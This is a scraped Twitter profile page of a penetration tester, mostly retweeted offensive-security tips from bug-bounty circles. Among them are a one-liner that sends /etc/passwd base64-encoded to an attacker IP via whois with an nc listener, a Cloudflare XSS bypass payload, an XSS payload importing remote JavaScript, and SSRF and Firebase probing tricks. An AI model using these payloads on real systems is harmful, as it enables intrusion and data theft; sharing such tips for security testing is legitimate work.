740i

@0x740i

OSCP | (ノ◕ヮ◕)ノ*:・゚✧

Seattle
Vrijeme pridruživanja: studeni 2016.

Tweetovi

Blokirali ste korisnika/cu @0x740i

Jeste li sigurni da želite vidjeti te tweetove? Time nećete deblokirati korisnika/cu @0x740i

  1. proslijedio/la je Tweet
    3. velj

    When testing for SSRF, change the HTTP version from 1.1 to HTTP/0.9 and remove the host header completely. This has worked to bypass several SSRF fixes in the past.

    Poništi
  2. proslijedio/la je Tweet
    1. velj

    I was tired of outdated XSS cheat sheets that don't touch on frameworks, html5, filter bypasses and other important stuff, so I made my own. I hope you find it as useful as I do. :)

    Poništi
  3. proslijedio/la je Tweet
    31. sij

    Good news — since China stole the IP of F-35 for their J-31 it means their software is crap too. NSA can just patch diff between the current builds and the stolen builds and they’ll have hundreds of 1day exploits! China’s industrial espionage is a vulnerability!! 😋

    Tweet je nedostupan.
    Poništi
  4. proslijedio/la je Tweet

    oneliner to retrieve ASN numbers of a company. (ls /tmp/GeoLite2-ASN-CSV.zip||wget --quiet -P /tmp "") 2>&1|grep X; unzip -c /tmp/GeoLite2-ASN-CSV.zip|grep -i airbnb|cut -d ',' -f 2|sort -fu

    Prikaži ovu nit
    Poništi
  5. proslijedio/la je Tweet
    26. stu 2019.

    Quick and dirty way to find parameters vulnerable to LFI & Path Traversal & SSRF & Open Redirect: Burp Search > Regex \?.*=(\/\/?\w+|\w+\/|\w+(%3A|:)(\/|%2F)|%2F|[\.\w]+\.\w{2,4}[^\w]) Suggestions are welcome.

    Prikaži ovu nit
    Poništi
  6. proslijedio/la je Tweet
    26. stu 2019.

    Great details and Payloads on SSRF ...DO check it out once.. “SSRF payloads” by Pravinrp

    Poništi
  7. proslijedio/la je Tweet
    23. stu 2019.

    decompile android app. and go to : Resources > resources.arsc > res > values > strings.xml search for *.firebaseio.com in xml file. ,and open browser try https://*.firebaseio.com/.json , you might find read access to database there. .

    Prikaži ovu nit
    Poništi
  8. proslijedio/la je Tweet

    Cloudflare XSS Bypass Payload <svg%0Aonauxclick=0;[1].some(confirm)//

    Prikaži ovu nit
    Poništi
  9. proslijedio/la je Tweet
    27. lis 2019.

    Have limited ways to exfiltrate data? Use Whois! attacker: nc -l -v -p 53 | sed "s/ //g" | base64 -d victim: whois -h $attackerIP -p 53 cat /etc/passwd | base64

    Prikaži ovu nit
    Poništi
  10. proslijedio/la je Tweet
    13. lis 2019.

    No telnet or netcat/nc? Use curl with telnet://host:port :)

    Poništi
  11. proslijedio/la je Tweet

    We've published new HTTP desync techniques, tooling and patches in HTTP Desync Attacks: what happened next, by

    Poništi
  12. proslijedio/la je Tweet
    17. ruj 2019.

    I just published How to find more IDORs

    Poništi
  13. proslijedio/la je Tweet
    13. ruj 2019.

    As promised, posting the next lazy write-up, this is how I went from Git to RCE. Bounty: $3500 If you enjoy these and want to see more, I will be posting others soon again.

    Poništi
  14. proslijedio/la je Tweet
    13. ruj 2019.

    New post. Coding a powershell bind shell that bypass that troublesome Windows Firewall pop-up when binding tcp sockets! No need for Local admin either.

    Poništi
  15. proslijedio/la je Tweet
    13. ruj 2019.

    HTTP Desync Attacks is now out on YouTube, courtesy of and

    Prikaži ovu nit
    Poništi
  16. proslijedio/la je Tweet
    20. kol 2019.

    Valve banned me on their H1 program. So... I release new EoP vulnerability at Steam. Another . Rus - Eng -

    Prikaži ovu nit
    Poništi
  17. proslijedio/la je Tweet
    24. srp 2019.

    Return a list of endpoints from a swagger.json. Pass them to your fuzzer(s), +profit? curl -s hxxps://petstore.swagger.io/v2/swagger.json | jq '.paths | keys[]'

    Poništi
  18. proslijedio/la je Tweet
    29. srp 2019.

    Load external javascript in script: import('url') For example: <img src onerror=import('//bo0om.ru/x/')> Works in Chrome

    Poništi
  19. proslijedio/la je Tweet
    12. srp 2019.

    The history of “news” is fascinating. Very tightly coupled with the history of propaganda, rumor and credibility. Early on people judged the credibility of news based on the person who delivered it. They didn’t like words on paper because they couldn’t determine credibility.

    Poništi
  20. proslijedio/la je Tweet
    5. srp 2019.

    I wrote up a POC, WindfarmDynamite, to educate myself on process injection using WNF. This work is based on the great research by / and the awesome work by modexp ❤️👻⚔️. For further details check out the GitHub page =>

    Poništi

Čini se da učitavanje traje već neko vrijeme.

Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.

    Možda bi vam se svidjelo i ovo:

    ·